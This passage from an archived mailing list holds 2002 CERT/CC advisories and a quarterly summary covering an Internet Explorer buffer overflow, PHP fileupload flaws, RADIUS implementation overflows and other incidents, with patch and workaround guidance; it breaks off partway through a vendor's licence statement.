merchantability, exclusivity or results obtained from use of the material. Carnegie Mellon University does not make any warranty of any kind with respect to freedom from patent, trademark, or copyright infringement. _____________________________________________________________ Conditions for use, disclaimers, and sponsorship information Copyright 2002 Carnegie Mellon University. Revision History February 12, 2002: Initial release -----BEGIN PGP SIGNATURE----- Version: PGP 6.5.8 iQCVAwUBPGltxKCVPMXQI2HJAQGVeAQAuHtxGBsmU5HI6PtqhpZ1rkpV+Cq3ChIU R1FUz4Zi2vzklH8jdXd10KqwZAPhXTPazeguhRyLVSUprMlSKqcXg3BCkH/y4WAl QUZ1VnQXMnMrxIJO1fv0WW0pcyM4W0iQBl0kCIlawPcjCGVniOCOr+4CE0f923wr uZiMJ5f2SEo= =h42e -----END PGP SIGNATURE----- From - Mon Feb 25 10:05:57 2002 Return-Path: Received: from canaveral.red.cert.org (canaveral.red.cert.org [192.88.209.11]) by uclink4.berkeley.edu (8.11.4/8.11.4) with ESMTP id g1PI0YM24852; Mon, 25 Feb 2002 10:00:34 -0800 (PST) Received: from localhost (lnchuser@localhost) by canaveral.red.cert.org (8.9.3/8.9.3/1.11) with SMTP id MAA15861; Mon, 25 Feb 2002 12:03:00 -0500 (EST) Date: Mon, 25 Feb 2002 12:03:00 -0500 (EST) Received: by canaveral.red.cert.org; Mon, 25 Feb 2002 11:57:36 -0500 Message-Id: From: CERT Advisory To: cert-advisory@cert.org Organization: CERT(R) Coordination Center - +1 412-268-7090 List-Help: , List-Subscribe: List-Unsubscribe: List-Post: NO (posting not allowed on this list) List-Owner: List-Archive: Subject: CERT Advisory CA-2002-04 Buffer Overflow in Microsoft Internet Explorer X-Mozilla-Status: 8001 X-Mozilla-Status2: 00000000 X-UIDL: 63 Status: RO X-Status: X-Keywords: X-UID: 38 -----BEGIN PGP SIGNED MESSAGE----- CERT Advisory CA-2002-04 Buffer Overflow in Microsoft Internet Explorer Original release date: February 25, 2002 Last revised: -- Source: CERT/CC A complete revision history can be found at the end of this file. Systems Affected * Microsoft Internet Explorer * Microsoft Outlook and Outlook Express * Other applications that use the Internet Explorer HTML rendering engine Overview Microsoft Internet Explorer contains a buffer overflow vulnerability in its handling of embedded objects in HTML documents. This vulnerability could allow an attacker to execute arbitrary code on the victim's system when the victim visits a web page or views an HTML email message. I. Description Internet Explorer supports the directive, which can be used to include arbitrary objects in HTML documents. Common types of embedded objects include multimedia files, Java applets, and ActiveX controls. The SRC attribute specifies the source path and filename of an object. For example, a MIDI sound might be embedded in a web page with the following HTML code: Internet Explorer uses attributes of the directive and MIME information from the web server to determine how to handle an embedded object. In most cases, a separate application or plugin is used. A group of Russian researchers, SECURITY.NNOV, has reported that Internet Explorer does not properly handle the SRC attribute of the directive. An HTML document, such as a web page or HTML email message, that contains a crafted SRC attribute can trigger a buffer overflow, executing code with the privileges of the user viewing the document. Microsoft Internet Explorer, Outlook, and Outlook Express are vulnerable. Other applications that use the Internet Explorer HTML rendering engine, such as Windows compiled HTML help (.chm) files and third-party email clients, may also be vulnerable. The CERT/CC is tracking this vulnerability as VU#932283, which corresponds directly to the "buffer overrun" vulnerability described in Microsoft Security Bulletin MS02-005. This vulnerability has been assigned the CVE identifier CAN-2002-0022. II. Impact By convincing a user to view a malicious HTML document, an attacker can cause the Internet Explorer HTML rendering engine to execute arbitrary code with the privileges of the user who viewed the HTML document. This vulnerability could be exploited to distribute viruses, worms, or other malicious code. III. Solution Apply a patch Microsoft has released a cumulative patch for Internet Explorer that corrects this vulnerability and several others. For more information about the patch and the vulnerabilities, please see Microsoft Security Bulletin MS02-005: http://www.microsoft.com/technet/security/bulletin/MS02-005.asp Disable ActiveX Controls and Plugins In Internet Explorer, plugins may be used to view, play, or otherwise process embedded objects. The execution of embedded objects is controlled by the "Run ActiveX Controls and Plugins" security option. Disabling this option will prevent embedded objects from being processed, and will therefore prevent exploitation of this vulnerability. According to MS02-005: The vulnerability could not be exploited if the "Run ActiveX Controls and Plugins" security option were disabled in the Security Zone in which the page was rendered. This is the default condition in the Restricted Sites Zone, and can be disabled manually in any other Zone. At a minimum, disable the "Run ActiveX Controls and Plugins" security option in the Internet Zone and the zone used by Outlook or Outlook Express. The "Run ActiveX Controls and Plugins" security option is disabled in the "High" zone security setting. Instructions for configuring the Internet Zone to use the "High" zone security setting can be found in the CERT/CC Malicious Web Scripts FAQ: http://www.cert.org/tech_tips/malicious_code_FAQ.html#steps Apply the Outlook Email Security Update Another way to effectively disable the processing of ActiveX controls and plugins in Outlook is to install the Outlook Email Security Update. The update configures Outlook to open email messages in the Restricted Sites Zone, where the "Run ActiveX Controls and Plugins" security option is disabled by default. In addition, the update provides further protection against malicious code that attempts to propagate via Outlook. * Outlook 2002 and Outlook Express 6 The functionality of the Outlook Email Security Update is included in Outlook 2002 and Outlook Express 6. * Outlook 2000 http://office.microsoft.com/downloads/2000/Out2ksec.aspx * Outlook 98 http://office.microsoft.com/downloads/9798/Out98sec.aspx Appendix A. - Vendor Information This appendix contains information provided by vendors for this advisory. When vendors report new information to the CERT/CC, we update this section and note the changes in our revision history. If a particular vendor is not listed below, we have not received their comments. Microsoft Microsoft has released a Security Bulletin and a Knowledge Base Article addressing this vulnerability: * Security Bulletin MS02-005 http://www.microsoft.com/technet/security/bulletin/MS02-005.asp * Knowledge Base Article Q317731 http://support.microsoft.com/default.aspx?scid=kb;en-us;Q317731 Cyrusoft Our email client Mulberry does not use the core HTML rendering engine library for its HTML display, and so is not affected by the bug in that library. Having looked at the details of this alert I can also confirm that our own HTML rendering engine is not affected by this, as it ignores the relevant tags. Appendix B. - References 1. http://www.kb.cert.org/vuls/id/932283 2. http://www.security.nnov.ru/advisories/mshtml.asp 3. http://www.microsoft.com/technet/security/bulletin/MS02-005.asp 4. http://support.microsoft.com/default.aspx?scid=kb;en-us;Q317731 5. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2002-0022 6. http://msdn.microsoft.com/workshop/author/dhtml/reference/objects/ embed.asp 7. http://developer.netscape.com/docs/manuals/htmlguid/tags14.htm#128 6379 _________________________________________________________________ The CERT/CC thanks ERRor and DarkZorro of domain Hell and 3APA3A of SECURITY.NNOV for reporting this issue to us. _________________________________________________________________ Author: Art Manion ______________________________________________________________________ This document is available from: http://www.cert.org/advisories/CA-2002-04.html ______________________________________________________________________ CERT/CC Contact Information Email: cert@cert.org Phone: +1 412-268-7090 (24-hour hotline) Fax: +1 412-268-6989 Postal address: CERT Coordination Center Software Engineering Institute Carnegie Mellon University Pittsburgh PA 15213-3890 U.S.A. CERT/CC personnel answer the hotline 08:00-17:00 EST(GMT-5) / EDT(GMT-4) Monday through Friday; they are on call for emergencies during other hours, on U.S. holidays, and on weekends. Using encryption We strongly urge you to encrypt sensitive information sent by email. Our public PGP key is available from http://www.cert.org/CERT_PGP.key If you prefer to use DES, please call the CERT hotline for more information. Getting security information CERT publications and other security information are available from our web site http://www.cert.org/ To subscribe to the CERT mailing list for advisories and bulletins, send email to majordomo@cert.org. Please include in the body of your message subscribe cert-advisory * "CERT" and "CERT Coordination Center" are registered in the U.S. Patent and Trademark Office. ______________________________________________________________________ NO WARRANTY Any material furnished by Carnegie Mellon University and the Software Engineering Institute is furnished on an "as is" basis. Carnegie Mellon University makes no warranties of any kind, either expressed or implied as to any matter including, but not limited to, warranty of fitness for a particular purpose or merchantability, exclusivity or results obtained from use of the material. Carnegie Mellon University does not make any warranty of any kind with respect to freedom from patent, trademark, or copyright infringement. _________________________________________________________________ Conditions for use, disclaimers, and sponsorship information Copyright 2002 Carnegie Mellon University. Revision History February 25, 2002: Initial release -----BEGIN PGP SIGNATURE----- Version: PGP 6.5.8 iQCVAwUBPHppRKCVPMXQI2HJAQEunQP9Hn+YSjmwNSLM4//5JrHP0ydgt0DFzh5k 0X40VYjxXcls0r3uZrpfC80W2f7DF3lS2kNcys4aEl+OXkTLn3p2BEkGYFhitwbG Tl0KvoESvT6b/1/w3TCjBregrAxPEXdw9KwQ2JFm/jmpX1+Gr15X7b2TDbf4sxJy q3UC1EPU9JE= =Jtq3 -----END PGP SIGNATURE----- From - Wed Feb 27 16:05:59 2002 Return-Path: Received: from canaveral.red.cert.org (canaveral.red.cert.org [192.88.209.11]) by uclink4.berkeley.edu (8.11.4/8.11.4) with ESMTP id g1S00gG23005; Wed, 27 Feb 2002 16:00:42 -0800 (PST) Received: from localhost (lnchuser@localhost) by canaveral.red.cert.org (8.9.3/8.9.3/1.11) with SMTP id QAA26404; Wed, 27 Feb 2002 16:54:43 -0500 (EST) Date: Wed, 27 Feb 2002 16:54:43 -0500 (EST) Received: by canaveral.red.cert.org; Wed, 27 Feb 2002 16:49:07 -0500 Message-Id: From: CERT Advisory To: cert-advisory@cert.org Organization: CERT(R) Coordination Center - +1 412-268-7090 List-Help: , List-Subscribe: List-Unsubscribe: List-Post: NO (posting not allowed on this list) List-Owner: List-Archive: Subject: CERT Advisory CA-2002-05 Multiple Vulnerabilities in PHP fileupload X-Mozilla-Status: 9001 X-Mozilla-Status2: 00000000 X-UIDL: 72 Status: RO X-Status: X-Keywords: X-UID: 39 -----BEGIN PGP SIGNED MESSAGE----- CERT Advisory CA-2002-05 Multiple Vulnerabilities in PHP fileupload Original release date: February 27, 2002 Last revised: -- Source: CERT/CC A complete revision history can be found at the end of this file. Systems Affected * Web servers running PHP Overview Multiple vulnerabilities exist in the PHP scripting language. These vulnerabilities could allow a remote attacker to execute arbitrary code with the privileges of the PHP process. I. Description PHP is a scripting language widely used in web development. PHP can be installed on a variety of web servers, including Apache, IIS, Caudium, Netscape and iPlanet, OmniHTTPd and others. Vulnerabilities in the php_mime_split function may allow an intruder to execute arbitrary code with the privileges of the web server. For additional details, see http://security.e-matters.de/advisories/012002.html Web servers that do not have PHP installed are not affected by this vulnerability. The CERT/CC is tracking this set of vulnerabilities as VU#297363. At this time, these vulnerabilities have not been assigned a CVE identifier. II. Impact Intruders can execute arbitrary code with the privileges of the web server, or interrupt normal operations of the web server. III. Solution Apply a Patch Upgrade to PHP version 4.1.2, available from http://www.php.net/do_download.php?download_file=php-4.1.2.tar.gz If upgrading is not possible, apply patches as described at http://www.php.net/downloads.php: * For PHP 4.10/4.11 http://www.php.net/do_download.php?download_file=rfc1867.c.diff-4.1.x.gz * For PHP 4.06 http://www.php.net/do_download.php?download_file=rfc1867.c.diff-4.0.6.gz * For PHP 3.0 http://www.php.net/do_download.php?download_file=mime.c.diff-3.0.gz If you are using version 4.20-dev, you are not affected by this vulnerability. Quoting from http://security.e-matters.de/advisories/012002.htm: "[U]sers running PHP 4.2.0-dev from cvs are not vulnerable to any of the described bugs because the fileupload code was completly rewritten for the 4.2.0 branch." Disable fileuploads If upgrading is not possible or a patch cannot be applied, you can avoid these vulnerabilities by disabling fileupload support. Edit the PHP configuration file php.ini as follows: file_uploads = off Note that this setting only applies to version 4.0.3 and above. However, this will prevent you from using fileuploads, which may not be acceptable in your environment. Appendix A. - Vendor Information This appendix contains information provided by vendors for this advisory. When vendors report new information to the CERT/CC, we update this section and note the changes in our revision history. If a particular vendor is not listed below, we have not received their comments. Apache Software Foundation Information about this vulnerability is available from http://www.php.net FreeBSD FreeBSD does not include any version of PHP by default, and so is not vulnerable. However, the FreeBSD Ports Collection does contain both PHP3 and PHP4 packages. Updates to the PHP packages are in progress and corrected packages will be available in the near future. MandrakeSoft MandrakeSoft distributes PHP in all distributions and we are currently working on patching our versions of PHP for Linux-Mandrake 7.1 and 7.2; Mandrake Linux 8.0, 8.0/ppc, 8.1, and 8.1/ia64; Single Network Firewall 7.2; Corporate Server 1.0.1. We anticipate having the updates out by the end of the week. Microsoft We do not use PHP in any products. NCSA NCSA does not include PHP as an add-in or bundled component in any products distributed. Red Hat Red Hat was notified of this issue on 27th February 2002. All supported versions of Red Hat Linux ship with PHP packages that are affected by these vulnerabilities. We will shortly be releasing errata packages which contain patched versions that are not vulnerable. The errata packages and our advisory will be available on our web site at the URL below. At the same time users of the Red Hat Network will be able to update their systems to patched versions using the up2date tool. http://www.redhat.com/support/errata/RHSA-2002-035.html _________________________________________________________________ The CERT Coordination Center thanks Stefan Esser, upon whose advisory this document is largely based. _________________________________________________________________ Author: Shawn V. Hernan _________________________________________________________________ Appendix B. - References 1. http://www.kb.cert.org/vuls/id/297363 2. http://security.e-matters.de/advisories/012002.html 3. http://www.iss.net/security_center/static/8281.php ______________________________________________________________________ This document is available from: http://www.cert.org/advisories/CA-2002-05.html ______________________________________________________________________ CERT/CC Contact Information Email: cert@cert.org Phone: +1 412-268-7090 (24-hour hotline) Fax: +1 412-268-6989 Postal address: CERT Coordination Center Software Engineering Institute Carnegie Mellon University Pittsburgh PA 15213-3890 U.S.A. CERT/CC personnel answer the hotline 08:00-17:00 EST(GMT-5) / EDT(GMT-4) Monday through Friday; they are on call for emergencies during other hours, on U.S. holidays, and on weekends. Using encryption We strongly urge you to encrypt sensitive information sent by email. Our public PGP key is available from http://www.cert.org/CERT_PGP.key If you prefer to use DES, please call the CERT hotline for more information. Getting security information CERT publications and other security information are available from our web site http://www.cert.org/ To subscribe to the CERT mailing list for advisories and bulletins, send email to majordomo@cert.org. Please include in the body of your message subscribe cert-advisory * "CERT" and "CERT Coordination Center" are registered in the U.S. Patent and Trademark Office. ______________________________________________________________________ NO WARRANTY Any material furnished by Carnegie Mellon University and the Software Engineering Institute is furnished on an "as is" basis. Carnegie Mellon University makes no warranties of any kind, either expressed or implied as to any matter including, but not limited to, warranty of fitness for a particular purpose or merchantability, exclusivity or results obtained from use of the material. Carnegie Mellon University does not make any warranty of any kind with respect to freedom from patent, trademark, or copyright infringement. _________________________________________________________________ Conditions for use, disclaimers, and sponsorship information Copyright 2002 Carnegie Mellon University. Revision History February 27, 2002: Initial release -----BEGIN PGP SIGNATURE----- Version: PGP 6.5.8 iQCVAwUBPH1T3KCVPMXQI2HJAQGMbwP+NglOFSnTqmCynobjzrF8Onalm5cHNePn +fTVP3JVrw5ktpyxtjnqveoMzaai0utVMlIDh4K34MOyipSD37W0ZLRezs0okyN0 bQt1UTW+pfBQX8CsZ1anCncEmF0/+fBcl3iNtp7jAT99PJveRCsH8GJVpHx/4nT1 pHvl8ng0VWs= =+NsK -----END PGP SIGNATURE----- From - Thu Feb 28 14:56:02 2002 Return-Path: Received: from canaveral.red.cert.org (canaveral.red.cert.org [192.88.209.11]) by uclink4.berkeley.edu (8.11.4/8.11.4) with ESMTP id g1SMqKC07086; Thu, 28 Feb 2002 14:52:20 -0800 (PST) Received: from localhost (lnchuser@localhost) by canaveral.red.cert.org (8.9.3/8.9.3/1.11) with SMTP id PAA01344; Thu, 28 Feb 2002 15:11:46 -0500 (EST) Date: Thu, 28 Feb 2002 15:11:46 -0500 (EST) Received: by canaveral.red.cert.org; Thu, 28 Feb 2002 15:06:00 -0500 Message-Id: From: CERT Advisory To: cert-advisory@cert.org Organization: CERT(R) Coordination Center - +1 412-268-7090 List-Help: , List-Subscribe: List-Unsubscribe: List-Post: NO (posting not allowed on this list) List-Owner: List-Archive: Subject: CERT Summary CS-2002-01 X-Mozilla-Status: 8001 X-Mozilla-Status2: 00000000 X-UIDL: 76 Status: RO X-Status: X-Keywords: X-UID: 40 -----BEGIN PGP SIGNED MESSAGE----- CERT Summary CS-2002-01 February 28, 2002 Each quarter, the CERT Coordination Center (CERT/CC) issues the CERT summary to draw attention to the types of attacks reported to our incident response team, as well as other noteworthy incident and vulnerability information. The summary includes pointers to sources of information for dealing with the problems. Past CERT summaries are available from: CERT Summaries http://www.cert.org/summaries/ ______________________________________________________________________ Recent Activity Since the last regularly scheduled CERT summary, issued in November 2001 (CS-2001-04), we have released several advisories, notably CA-2002-03, describing multiple vulnerabilities in SNMP. In addition, we have published 2001 statistics, our annual report, and a white paper on external computer security incidents. For more current information on activity being reported to the CERT/CC, please visit the CERT/CC Current Activity page. The Current Activity page is a regularly updated summary of the most frequent, high-impact types of security incidents and vulnerabilities being reported to the CERT/CC. The information on the Current Activity page is reviewed and updated as reporting trends change. CERT/CC Current Activity http://www.cert.org/current/current_activity.html 1. Multiple Vulnerabilities in SNMP Numerous vulnerabilities have been reported in multiple vendors' SNMP implementations. These vulnerabilities may allow unauthorized privileged access, denial-of-service attacks, or cause unstable behavior. If your site uses SNMP in any capacity, the CERT/CC encourages you to read this advisory and follow the advice provided in the Solution section. In addition to this advisory, we also have an FAQ on SNMP vulnerabilities. CERT Advisory CA-2002-03: Multiple Vulnerabilities In Many Implementations of the Simple Network Management Protocol (SNMP) http://www.cert.org/advisories/CA-2002-03.html Simple Network Management Protocol (SNMP) Vulnerabilities Frequently Asked Questions (FAQ) http://www.cert.org/tech_tips/snmp_faq.html 2. Exploitation of Vulnerability in Solaris CDE Subprocess Control Service Since CA-2001-31 was originally released last November, the CERT/CC has received reports of scanning for dtspcd (6112/tcp). Just recently, however, we have received credible reports of an exploit for Solaris systems. Using network traces provided by The Honeynet Project, we have confirmed that the dtspcd vulnerability identified in CA-2001-31 and discussed in VU#172583 is actively being exploited. CERT Advisory CA-2002-01: Exploitation of Vulnerability in CDE Subprocess Control Service http://www.cert.org/advisories/CA-2002-01.html CERT Advisory CA-2001-31: Buffer Overflow in CDE Subprocess Control Service http://www.cert.org/advisories/CA-2001-31.html Vulnerability Note #172583: Common Desktop Environment (CDE) Subprocess Control Service dtspcd contains buffer overflow http://www.kb.cert.org/vuls/id/172583 3. Buffer Overflow Vulnerability in Microsoft Windows UPnP Service Vulnerabilities in software included by default on Microsoft Windows XP, and optionally on Windows ME and Windows 98, may allow an intruder to execute arbitrary code on vulnerable systems, to launch denial-of-service attacks against vulnerable systems, or to use vulnerable systems to launch denial-of-service attacks against third-party systems. To date we have not received any confirmed reports of UPnP exploitation; however, we urge Windows users to follow the advice provided in CA-2001-37 to protect their systems. CERT Advisory CA-2001-37: Buffer Overflow in UPnP Service On Microsoft Windows http://www.cert.org/advisories/CA-2001-37.html Vulnerability Note #951555: Microsoft Windows Universal Plug and Play (UPNP) vulnerable to buffer overflow via malformed advertisement packets http://www.kb.cert.org/vuls/id/951555 Vulnerability Note #411059: Microsoft Windows Universal Plug and Play (UPNP) fails to limit the data returned in response to a NOTIFY message http://www.kb.cert.org/vuls/id/411059 4. Recent Activity Against Secure Shell Daemons There are multiple vulnerabilities in several implementations of the Secure Shell (SSH) protocol. The SSH protocol enables a secure communications channel from a client to a server. We are still seeing a high amount of scanning for SSH daemons, and we are receiving reports of exploitation. System administrators should review their configurations to ensure that they have applied all relevant patches. CERT Advisory CA-2001-35: Recent Activity Against Secure Shell Daemons http://www.cert.org/advisories/CA-2001-35.html Vulnerability Note #945216: SSH CRC32 attack detection code contains remote integer overflow http://www.kb.cert.org/vuls/id/945216 CERT Incident Note IN-2001-12: Exploitation of vulnerability in SSH1 CRC-32 compensation attack detector http://www.cert.org/incident_notes/IN-2001-12.html 5. Multiple Vulnerabilities in WU-FTPD WU-FTPD is a widely deployed software package used to provide File Transfer Protocol (FTP) services on UNIX and Linux systems. There are two vulnerabilities in WU-FTPD that expose a system to potential remote root compromise by anyone with access to the FTP service. These vulnerabilities have recently received increased scrutiny. CERT Advisory CA-2001-33: Multiple Vulnerabilities in WU-FTPD http://www.cert.org/advisories/CA-2001-33.html 6. W32/BadTrans Worm We have seen a steady stream of reports related to W32/Badtrans since November 2001. W32/BadTrans is a malicious Windows program distributed as an email file attachment. Because of a known vulnerability in Internet Explorer, some email programs, such as Outlook Express and Outlook, may execute the malicious program as soon as the email message is viewed. Windows users should apply appropriate patches and update their antivirus programs as described in IN-2001-14. CERT Incident Note IN-2001-14: W32/BadTrans Worm http://www.cert.org/incident_notes/IN-2001-14.html 7. "Kaiten" Malicious Code The CERT/CC has received reports of a new variant of the "Kaiten" malicious code being installed through exploitation of null default sa passwords in Microsoft SQL Server and Microsoft Data Engine. (Microsoft SQL 2000 Server will allow a null sa password to be used, but this is not default behavior.) Various sources have referred to this malicious code as "W32/Voyager," "Voyager Alpha Force," and "W32/CBlade.worm." CERT Incident Note IN-2001-13: "Kaiten" Malicious Code Installed by Exploiting Null Default Passwords in MS-SQL http://www.cert.org/incident_notes/IN-2001-13.html ______________________________________________________________________ What's New and Updated Since the last CERT Summary, we have published new and updated * CERT/CC 2001 Annual Report http://www.cert.org/annual_rpts/cert_rpt_01.html * Advisories http://www.cert.org/advisories/ * Computer Security Incident Response Team (CSIRT) Frequently Asked Questions http://www.cert.org/csirts/csirt_faq.html * External Security Incidents White Paper http://www.cert.org/archive/pdf/external-incidents.pdf * Incident Notes http://www.cert.org/incident_notes/ * CERT/CC Statistics http://www.cert.org/stats/cert_stats.html * Training Schedule http:/www.cert.org/training/ ______________________________________________________________________ This document is available from: http://www.cert.org/summaries/CS-2002-01.html ______________________________________________________________________ CERT/CC Contact Information Email: cert@cert.org Phone: +1 412-268-7090 (24-hour hotline) Fax: +1 412-268-6989 Postal address: CERT Coordination Center Software Engineering Institute Carnegie Mellon University Pittsburgh PA 15213-3890 U.S.A. CERT/CC personnel answer the hotline 08:00-17:00 EST(GMT-5) / EDT(GMT-4) Monday through Friday; they are on call for emergencies during other hours, on U.S. holidays, and on weekends. Using encryption We strongly urge you to encrypt sensitive information sent by email. Our public PGP key is available from http://www.cert.org/CERT_PGP.key If you prefer to use DES, please call the CERT hotline for more information. Getting security information CERT publications and other security information are available from our web site http://www.cert.org/ To subscribe to the CERT mailing list for advisories and bulletins, send email to majordomo@cert.org. Please include in the body of your message subscribe cert-advisory * "CERT" and "CERT Coordination Center" are registered in the U.S. Patent and Trademark Office. ______________________________________________________________________ NO WARRANTY Any material furnished by Carnegie Mellon University and the Software Engineering Institute is furnished on an "as is" basis. Carnegie Mellon University makes no warranties of any kind, either expressed or implied as to any matter including, but not limited to, warranty of fitness for a particular purpose or merchantability, exclusivity or results obtained from use of the material. Carnegie Mellon University does not make any warranty of any kind with respect to freedom from patent, trademark, or copyright infringement. _________________________________________________________________ Conditions for use, disclaimers, and sponsorship information Copyright 2002 Carnegie Mellon University. -----BEGIN PGP SIGNATURE----- Version: PGP 6.5.8 iQCVAwUBPH6JoqCVPMXQI2HJAQGjUwQAu1bT6qi08N+dsPGZeEFWIMVxBPQbqmh5 W6ad/WSWAi1jNPhPIg4DmLgzUirSk7MOyybgcMEK0KZVhr+HB+0aHiHv/4lLlvmC re8rqW5gLGq/7AtoV1MfppeSdEKWfgWvUHX9NfZ5aDlS382pWoxTa2HnrxMkDDHe Pg57W9mlkyw= =jMzu -----END PGP SIGNATURE----- From - Mon Mar 4 14:26:14 2002 Return-Path: Received: from canaveral.red.cert.org (canaveral.red.cert.org [192.88.209.11]) by uclink4.berkeley.edu (8.11.4/8.11.4) with ESMTP id g24MMUV18025; Mon, 4 Mar 2002 14:22:30 -0800 (PST) Received: from localhost (lnchuser@localhost) by canaveral.red.cert.org (8.9.3/8.9.3/1.11) with SMTP id OAA23603; Mon, 4 Mar 2002 14:44:18 -0500 (EST) Date: Mon, 4 Mar 2002 14:44:18 -0500 (EST) Received: by canaveral.red.cert.org; Mon, 4 Mar 2002 14:34:55 -0500 Message-Id: From: CERT Advisory To: cert-advisory@cert.org Organization: CERT(R) Coordination Center - +1 412-268-7090 List-Help: , List-Subscribe: List-Unsubscribe: List-Post: NO (posting not allowed on this list) List-Owner: List-Archive: Subject: CERT Advisory CA-2002-06 Vulnerabilities in Various Implementations of the X-Mozilla-Status: 8001 X-Mozilla-Status2: 00000000 X-UIDL: 84 Status: RO X-Status: X-Keywords: X-UID: 41 -----BEGIN PGP SIGNED MESSAGE----- CERT Advisory CA-2002-06 Vulnerabilities in Various Implementations of the RADIUS Protocol Original release date: March 4, 2002 Last revised: -- Source: CERT/CC A complete revision history can be found at the end of this file. Systems Affected Systems running any of the following RADIUS implementations: * Ascend RADIUS versions 1.16 and prior * Cistron RADIUS versions 1.6.5 and prior * FreeRADIUS versions 0.3 and prior * GnuRADIUS versions 0.95 and prior * ICRADIUS versions 0.18.1 and prior * Livingston RADIUS versions 2.1 and earlier * RADIUS (previously known as Lucent RADIUS) versions 2.1 and prior * RADIUSClient versions 0.3.1 and prior * XTRADIUS 1.1-pre1 and prior * YARD RADIUS 1.0.19 and prior Overview Remote Authentication Dial In User Service (RADIUS) servers are used for authentication, authorization and accounting for terminals that speak the RADIUS protocol. Multiple vulnerabilities have been discovered in several implementations of the RADIUS protocol. I. Description Two vulnerabilities in various implementations of RADIUS clients and servers have been reported to several vendors and the CERT/CC. They are remotely exploitable, and on most systems result in a denial of service. VU#589523 may allow the execution of code if the attacker has knowledge of the shared secret. VU#589523 - Multiple implementations of the RADIUS protocol contain a digest calculation buffer overflow Multiple implementations of the RADIUS protocol contain a buffer overflow in the function that calculates message digests. During the message digest calculation, a string containing the shared secret is concatenated with a packet received without checking the size of the target buffer. This makes it possible to overflow the buffer with shared secret data. This can lead to a denial of service against the server. If the shared secret is known by the attacker, then it may be possible to use this information to execute arbitrary code with the privileges of the victim RADIUS server or client, usually root. It should be noted that gaining knowledge of the shared secret is not a trivial task. Systems Affected by VU#589523 * Ascend RADIUS versions 1.16 and prior * Cistron RADIUS versions 1.6.4 and prior * FreeRADIUS versions 0.3 and prior * GnuRADIUS versions 0.95 and prior * ICRADIUS versions 0.18.1 and prior * Livingston RADIUS versions 2.1 and earlier * RADIUS (commonly known as Lucent RADIUS) versions 2.1 and prior * RADIUSClient versions 0.3.1 and prior * YARD RADIUS 1.0.19 and prior * XTRADIUS 1.1-pre1 and prior VU#936683 - Multiple implementations of the RADIUS protocol do not adequately validate the vendor-length of vendor-specific attributes. Various RADIUS servers and clients permit the passing of vendor-specific and user-specific attributes. Several implementations of RADIUS fail to check the vendor-length of vendor-specific attributes. It is possible to cause a denial of service against RADIUS servers with a malformed vendor-specific attribute. RADIUS servers and clients fail to validate the vendor-length inside vendor-specific attributes. The vendor-length shouldn't be less than 2. If vendor-length is less than 2, the RADIUS server (or client) calculates the attribute length as a negative number. The attribute length is then used in various functions. In most RADIUS servers the function that performs this calculation is rad_recv() or radrecv(). Some applications may use the same logic to validate user-specific attributes and be vulnerable via the same method. Systems Affected by VU#936683 * Cistron RADIUS versions 1.6.5 and prior * FreeRADIUS versions 0.3 and prior * ICRADIUS versions 0.18.1 and prior * Livingston RADIUS versions 2.1 and earlier * YARD RADIUS 1.0.19 and prior * XTRADIUS 1.1-pre1 and prior II. Impact Both of the vulnerabilities allow an attacker can cause a denial of service of the RADIUS server. On some systems, VU#589523 may allow the execution of code if the attacker has knowledge of the shared secret. III. Solution Apply a patch, or upgrade to the version specified by your vendor. Block packets to the RADIUS server at the firewall Limit access to the RADIUS server to those addresses which are approved to authenticate to the RADIUS server. Note that this does not protect your server from attacks originating from these addresses. Appendix A. - Vendor Information This appendix contains information provided by vendors for this advisory. When vendors report new information to the CERT/CC, we update this section and note the changes in our revision history. If a particular vendor is not listed below, we have not received their comments. Apple Mac OS X and Mac OS X Server -- Not vulnerable since RADIUS is not shipped with those products. Cisco Cisco Systems has reviewed the following products that implement RADIUS with regards to this vulnerability, and has determined that the following are NOT vulnerable to this issue; Cisco IOS, Cisco Catalyst OS, Cisco Secure PIX firewall, Cisco Secure Access Control System for Windows, Cisco Aironet, Cisco Access Registrar, and Cisco Resource Pooling Management Service. At this time, we are not aware of any Cisco products that are vulnerable to the issues discussed in this report. Cistron You state 2 vulnerabilities: 1. Digest Calculation Buffer Overflow Vulnerability Cistron Radius up to and including 1.6.4 is vulnerable 2. Invalid attribute length calculation on malformed Vendor-Specific attr. Cistron Radius up to and including 1.6.5 is vulnerable Today I have released version 1.6.6, which also fixes (2). The homepage is http://www.radius.cistron.nl/ on which you can also find the ChangeLog. An announcement to the cistron-radius mailinglist was also made today. So everybody should upgrade to 1.6.6. FreeBSD FreeBSD versions prior to 4.5-RELEASE (which is shipping today or tomorrow or so) do contain some of the RADIUS packages mentioned below: radiusd-cistron, freeradius, ascend-radius, icradius, and radiusclient. However, 4.5-RELEASE will not ship with any of these RADIUS packages, except radiusclient. Also, note that the information you [CERT/CC] have forwarded previously indicates that neither Merit RADIUS (radius-basic) nor radiusclient are vulnerable. Fujitsu Fujitsu's UXP/V operating system is not vulnerable because UXP/V does not support the Radius functionality. GnuRADIUS The bug was fixed in version 0.96. Hewlett-Packard We have tested our Version of RADIUS, and we are NOT vulnerable. IBM IBM's AIX operating system, all versions, is not vulnerable as we do not ship the RADIUS project with AIX. Juniper Networks Juniper products have been tested and are not affected by this vulnerability. Lucent Technologies, Inc. Lucent and Ascend "Free" RADIUS server Product Status Reiteration of product End of Life February 14, 2002 The purpose of this announcement is to make official the end of life of products based on the Livingston Enterprises RADIUS server, and to reiterate the terms of the original license. Prior to the Lucent Technologies acquisition of Ascend Communications and Livingston Enterprises, both companies distributed RADIUS servers at no cost to their customers. The initial Livingston server was RADIUS 1.16 followed in June 1999 by RADIUS 2.1. The Ascend server was based on the Livingston 1.16 product with the most recent version being released in June 1998. Lucent Technologies no longer distributes these products, does not provide any support services for these products, and has not done so for some time. All of these products were distributed as-is without warranty, under the BSD "Open Source" license with the following terms: This software is provided by the copyright holders and contributors ``as is'' and any express or implied warranties, including, but not limited to, the implied warranties of merchantability and fitness for a particular purpose are disclaimed. In no event shall the copyright holder or contributors be liable for any direct, indirect, incidental, special, exemplary, or consequential damages (including, but not limited to, procurement of substitute goods or services; loss of use, data, or profits; or business interruption) however caused and on any theory of liability, whether in contract, strict liability, or tort (including negligence or otherwise) arising in any way out of the use of this software, even if advised of the possibility of such damage. Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met: * Redistributions of source code must retain the above copyright notice, this list of conditions and the following disclaimer. * Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following disclaimer in the documentation and/or other materials provided with the distribution. * All advertising materials mentioning features or use of this software must display the following acknowledgement: This product includes software developed by Lucent Technologies and its 